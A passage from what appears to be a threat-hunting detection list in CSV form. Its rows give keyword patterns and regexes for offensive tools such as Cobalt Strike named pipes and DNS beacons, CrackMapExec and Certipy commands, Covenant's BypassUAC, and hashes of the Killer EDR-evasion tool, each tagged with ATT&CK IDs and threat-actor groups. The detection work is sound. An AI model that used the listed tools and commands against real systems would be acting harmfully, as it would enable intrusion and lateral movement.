- T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - 
Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63531" "\\MSSE-*","\\\\MSSE\-.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice 
Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63532" "\\mypipe-*","\\\\mypipe\-.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 
- 18)","10","10","N/A","N/A","N/A","N/A","63533" "\\PGMessagePipe*","\\\\PGMessagePipe.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63534" "\\postex_*","\\\\postex_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that 
replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63535" "\\postex_ssh_*","\\\\postex_ssh_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63536" "\\SearchTextHarvester*","\\\\SearchTextHarvester.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 
- T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63537" "\\UIA_PIPE*","\\\\UIA_PIPE.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63538" "\\Winsock2\CatalogChangeListener-*","\\\\Winsock2\\CatalogChangeListener\-.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 
- MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63539" "\Ladon *.exe*","\\Ladon\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - 
DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","63540" "afrog -*","afrog\s\-.{0,1000}","offensive_tool_keyword","afrog","A tool for finding vulnerabilities","T1083 - T1065 - T1204 - T1046","TA0007 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/zan8in/afrog","1","0","N/A","N/A","N/A","10","3791","414","2025-04-22T07:32:19Z","2022-02-24T06:00:32Z","63541" "b84798b914f570f9b52bf3fe754c2559795aa6c3daa4c4344f4bce69f5f759d9","b84798b914f570f9b52bf3fe754c2559795aa6c3daa4c4344f4bce69f5f759d9","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","#filehash","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","63542" "BypassUAC *","BypassUAC\s.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","63543" "c40e57334fa15d54a9c0ebeb4345e3e2e9f26ba044b5fe923625a9f66e55c360","c40e57334fa15d54a9c0ebeb4345e3e2e9f26ba044b5fe923625a9f66e55c360","offensive_tool_keyword","killer","evade AVs 
and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","#filehash","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","63544" "cd PayGen","cd\sPayGen","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1059.001 - T1209 - T1105 - T1547 - T1027","TA0003 - TA0005 - TA0002 - TA0011","N/A","N/A","Persistence","https://github.com/youhacker55/PayGen","1","0","N/A","N/A","N/A","1","4","0","2023-02-23T00:05:57Z","2021-06-16T20:20:55Z","63545" "certipy *","certipy\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","63546" "cme smb *","cme\ssmb\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","63547" "cme smb -*","cme\ssmb\s\-.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","63548" "cme winrm *","cme\swinrm\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","63549" "dcenum *","dcenum\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","63550" "detect-hooks","detect\-hooks","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/Detect-Hooks","1","0","N/A","N/A","10","10","158","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z","63551" "doc.1a.*\.*","doc\.1a\..{0,50}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - 
CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#dnsquery","dns query field","10","10","N/A","N/A","N/A","N/A","63552" "doc.4a.*\.*","doc\.4a\..{0,50}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - 